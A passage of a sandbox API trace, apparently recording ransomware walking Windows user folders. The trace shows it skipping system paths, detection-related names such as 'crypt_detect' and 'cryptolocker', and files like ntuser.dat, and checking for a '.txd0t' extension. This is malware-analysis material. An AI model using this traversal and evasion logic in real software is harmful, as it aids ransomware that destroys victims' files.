lpFileName="C:\\Users\\Default\\Favorites\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec1c70 [0119.181] StrCmpW (psz1=".", psz2=".") returned 0 [0119.181] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.181] StrCmpW (psz1="..", psz2=".") returned 1 [0119.181] StrCmpW (psz1="..", psz2="..") returned 0 [0119.181] FindNextFileW (in: hFindFile=0xec1c70, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb8e09, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0119.182] FindClose (in: hFindFile=0xec1c70 | out: hFindFile=0xec1c70) returned 1 [0119.182] GetProcessHeap () returned 0xe30000 [0119.182] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.182] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Links", cAlternateFileName="")) returned 1 [0119.182] StrCmpW (psz1="Links", psz2=".") returned 1 [0119.182] StrCmpW (psz1="Links", psz2="..") returned 1 [0119.182] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.182] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0119.182] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Links", cchMax=1058 | out: psz1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\windows\\system32\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\windows\\system\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\appdata\\local\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\boot\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\perflogs\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\programdata\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\drivers\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\wsus\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="crypt_detect") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="cryptolocker") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="ransomware") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="C:\\WINDOWS") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.182] StrStrIW (lpFirst="C:\\Users\\Default\\Links", lpSrch="C:\\Program Files") returned 0x0 [0119.182] GetProcessHeap () returned 0xe30000 [0119.182] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xef3600 [0119.183] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\Links", cchMax=1070 | out: psz1="C:\\Users\\Default\\Links") returned="C:\\Users\\Default\\Links" [0119.183] StrNCatW (in: psz1="C:\\Users\\Default\\Links", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Default\\Links\\*") returned="C:\\Users\\Default\\Links\\*" [0119.183] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Links\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec18b0 [0119.183] StrCmpW (psz1=".", psz2=".") returned 0 [0119.183] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.183] StrCmpW (psz1="..", psz2=".") returned 1 [0119.183] StrCmpW (psz1="..", psz2="..") returned 0 [0119.183] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fb994f, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x550e9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0119.183] FindClose (in: hFindFile=0xec18b0 | out: hFindFile=0xec18b0) returned 1 [0119.183] GetProcessHeap () returned 0xe30000 [0119.183] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.183] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Local Settings", cAlternateFileName="LOCALS~1")) returned 1 [0119.183] StrCmpW (psz1="Local Settings", psz2=".") returned 1 [0119.183] StrCmpW (psz1="Local Settings", psz2="..") returned 1 [0119.183] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Music", cAlternateFileName="")) returned 1 [0119.183] StrCmpW (psz1="Music", psz2=".") returned 1 [0119.183] StrCmpW (psz1="Music", psz2="..") returned 1 [0119.183] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.183] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0119.183] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Music", cchMax=1058 | out: psz1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0119.183] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\windows\\system32\\") returned 0x0 [0119.183] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\windows\\syswow64\\") returned 0x0 [0119.183] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\windows\\system\\") returned 0x0 [0119.183] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\windows\\winsxs\\") returned 0x0 [0119.183] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\appdata\\roaming\\") returned 0x0 [0119.183] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\appdata\\local\\") returned 0x0 [0119.183] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\appdata\\locallow\\") returned 0x0 [0119.183] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\all users\\microsoft\\") returned 0x0 [0119.183] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="\\inetpub\\logs\\") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\boot\\") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\perflogs\\") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\programdata\\") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\drivers\\") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\wsus\\") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\efstmpwp\\") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch=":\\$recycle.bin\\") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="crypt_detect") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="cryptolocker") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="ransomware") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="C:\\WINDOWS") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="C:\\Program Files (x86)") returned 0x0 [0119.184] StrStrIW (lpFirst="C:\\Users\\Default\\Music", lpSrch="C:\\Program Files") returned 0x0 [0119.184] GetProcessHeap () returned 0xe30000 [0119.184] RtlAllocateHeap (HeapHandle=0xe30000, Flags=0x8, Size=0x4ae) returned 0xef3600 [0119.184] StrCpyNW (in: psz1=0xef3600, psz2="C:\\Users\\Default\\Music", cchMax=1070 | out: psz1="C:\\Users\\Default\\Music") returned="C:\\Users\\Default\\Music" [0119.184] StrNCatW (in: psz1="C:\\Users\\Default\\Music", psz2="\\*", cchMax=1070 | out: psz1="C:\\Users\\Default\\Music\\*") returned="C:\\Users\\Default\\Music\\*" [0119.184] FindFirstFileW (in: lpFileName="C:\\Users\\Default\\Music\\*", lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0xec18b0 [0119.184] StrCmpW (psz1=".", psz2=".") returned 0 [0119.184] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0119.184] StrCmpW (psz1="..", psz2=".") returned 1 [0119.184] StrCmpW (psz1="..", psz2="..") returned 0 [0119.184] FindNextFileW (in: hFindFile=0xec18b0, lpFindFileData=0x599ee40 | out: lpFindFileData=0x599ee40*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbaa63, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xe9f, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0119.184] FindClose (in: hFindFile=0xec18b0 | out: hFindFile=0xec18b0) returned 1 [0119.184] GetProcessHeap () returned 0xe30000 [0119.184] HeapFree (in: hHeap=0xe30000, dwFlags=0x0, lpMem=0xef3600 | out: hHeap=0xe30000) returned 1 [0119.184] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="My Documents", cAlternateFileName="MYDOCU~1")) returned 1 [0119.184] StrCmpW (psz1="My Documents", psz2=".") returned 1 [0119.185] StrCmpW (psz1="My Documents", psz2="..") returned 1 [0119.185] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x785fe036, ftCreationTime.dwHighDateTime=0x1d32743, ftLastAccessTime.dwLowDateTime=0x785fe036, ftLastAccessTime.dwHighDateTime=0x1d32743, ftLastWriteTime.dwLowDateTime=0x785fe036, ftLastWriteTime.dwHighDateTime=0x1d32743, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NetHood", cAlternateFileName="")) returned 1 [0119.185] StrCmpW (psz1="NetHood", psz2=".") returned 1 [0119.185] StrCmpW (psz1="NetHood", psz2="..") returned 1 [0119.185] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c4aac40, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x19fa8eb, ftLastAccessTime.dwHighDateTime=0x1d5d811, ftLastWriteTime.dwLowDateTime=0x19fa8eb, ftLastWriteTime.dwHighDateTime=0x1d5d811, nFileSizeHigh=0x0, nFileSizeLow=0x40000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT", cAlternateFileName="")) returned 1 [0119.185] StrCmpW (psz1="NTUSER.DAT", psz2=".") returned 1 [0119.185] StrCmpW (psz1="NTUSER.DAT", psz2="..") returned 1 [0119.185] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.185] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0119.185] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="NTUSER.DAT", cchMax=1058 | out: psz1="C:\\Users\\Default\\NTUSER.DAT") returned="C:\\Users\\Default\\NTUSER.DAT" [0119.185] PathFindExtensionW (pszPath="NTUSER.DAT") returned=".DAT" [0119.185] StrCmpW (psz1=".DAT", psz2=".txd0t") returned -1 [0119.185] StrCmpIW (psz1="NTUSER.DAT", psz2="bootsect.bak") returned 1 [0119.185] StrCmpIW (psz1="NTUSER.DAT", psz2="iconcache.db") returned 1 [0119.185] StrCmpIW (psz1="NTUSER.DAT", psz2="thumbs.db") returned -1 [0119.185] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransomware ") returned 1 [0119.185] StrCmpIW (psz1="NTUSER.DAT", psz2=" ransom ") returned 1 [0119.185] StrCmpIW (psz1="NTUSER.DAT", psz2="debug.txt") returned 1 [0119.185] StrCmpIW (psz1="NTUSER.DAT", psz2="boot.ini") returned 1 [0119.185] StrCmpIW (psz1="NTUSER.DAT", psz2="desktop.ini") returned 1 [0119.185] StrCmpIW (psz1="NTUSER.DAT", psz2="autorun.inf") returned 1 [0119.185] StrCmpIW (psz1="NTUSER.DAT", psz2="ntuser.dat") returned 0 [0119.185] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c6021fd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x6c6021fd, ftLastAccessTime.dwHighDateTime=0x1d29fdc, ftLastWriteTime.dwLowDateTime=0x6c6021fd, ftLastWriteTime.dwHighDateTime=0x1d29fdc, nFileSizeHigh=0x0, nFileSizeLow=0x6000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG1", cAlternateFileName="NTUSER~1.LOG")) returned 1 [0119.185] StrCmpW (psz1="NTUSER.DAT.LOG1", psz2=".") returned 1 [0119.185] StrCmpW (psz1="NTUSER.DAT.LOG1", psz2="..") returned 1 [0119.185] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x6c6021fd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x6c6021fd, ftLastAccessTime.dwHighDateTime=0x1d29fdc, ftLastWriteTime.dwLowDateTime=0x6c6021fd, ftLastWriteTime.dwHighDateTime=0x1d29fdc, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT.LOG2", cAlternateFileName="NTUSER~2.LOG")) returned 1 [0119.185] StrCmpW (psz1="NTUSER.DAT.LOG2", psz2=".") returned 1 [0119.185] StrCmpW (psz1="NTUSER.DAT.LOG2", psz2="..") returned 1 [0119.185] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7dab84ff, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0xacbd1187, ftLastAccessTime.dwHighDateTime=0x1d2fa0d, ftLastWriteTime.dwLowDateTime=0x855f639a, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", cAlternateFileName="NTUSER~1.BLF")) returned 1 [0119.185] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", psz2=".") returned 1 [0119.185] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TM.blf", psz2="..") returned 1 [0119.185] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7ddd9675, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0xacbd1187, ftLastAccessTime.dwHighDateTime=0x1d2fa0d, ftLastWriteTime.dwLowDateTime=0x855d0141, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~1.REG")) returned 1 [0119.185] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", psz2=".") returned 1 [0119.185] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000001.regtrans-ms", psz2="..") returned 1 [0119.185] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x7de71fdf, ftCreationTime.dwHighDateTime=0x1d2fa07, ftLastAccessTime.dwLowDateTime=0x855d0141, ftLastAccessTime.dwHighDateTime=0x1d2fa07, ftLastWriteTime.dwLowDateTime=0x855d0141, ftLastWriteTime.dwHighDateTime=0x1d2fa07, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~2.REG")) returned 1 [0119.185] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", psz2=".") returned 1 [0119.186] StrCmpW (psz1="NTUSER.DAT{4e074668-0c1c-11e7-a943-e41d2d718a20}.TMContainer00000000000000000002.regtrans-ms", psz2="..") returned 1 [0119.186] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b6f06dc, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b6f06dc, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x10000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", cAlternateFileName="NTUSER~2.BLF")) returned 1 [0119.186] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2=".") returned 1 [0119.186] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TM.blf", psz2="..") returned 1 [0119.186] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b6f06dc, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b6f06dc, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", cAlternateFileName="NTUSER~3.REG")) returned 1 [0119.186] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2=".") returned 1 [0119.186] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000001.regtrans-ms", psz2="..") returned 1 [0119.186] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x8b716935, ftCreationTime.dwHighDateTime=0x1d32741, ftLastAccessTime.dwLowDateTime=0x8b716935, ftLastAccessTime.dwHighDateTime=0x1d32741, ftLastWriteTime.dwLowDateTime=0x8b762e4b, ftLastWriteTime.dwHighDateTime=0x1d32741, nFileSizeHigh=0x0, nFileSizeLow=0x80000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", cAlternateFileName="NTUSER~4.REG")) returned 1 [0119.186] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2=".") returned 1 [0119.186] StrCmpW (psz1="NTUSER.DAT{fae9930d-933c-11e7-a51d-b808901d6c9b}.TMContainer00000000000000000002.regtrans-ms", psz2="..") returned 1 [0119.186] FindNextFileW (in: hFindFile=0xec2030, lpFindFileData=0x599f0f0 | out: lpFindFileData=0x599f0f0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xd9eaaa, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc3fbafc3, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xd9eaaa, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Pictures", cAlternateFileName="")) returned 1 [0119.186] StrCmpW (psz1="Pictures", psz2=".") returned 1 [0119.186] StrCmpW (psz1="Pictures", psz2="..") returned 1 [0119.186] StrCpyNW (in: psz1=0x6874278, psz2="C:\\Users\\Default", cchMax=1058 | out: psz1="C:\\Users\\Default") returned="C:\\Users\\Default" [0119.186] StrNCatW (in: psz1="C:\\Users\\Default", psz2="\\", cchMax=1058 | out: psz1="C:\\Users\\Default\\") returned="C:\\Users\\Default\\" [0119.186] StrNCatW (in: psz1="C:\\Users\\Default\\", psz2="Pictures", cchMax=1058 | out: psz1="C:\\Users\\Default\\Pictures") returned="C:\\Users\\Default\\Pictures" [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", lpSrch="\\windows\\system32\\") returned 0x0 [0119.186] StrStrIW (lpFirst="C:\\Users\\Default\\Pictures", 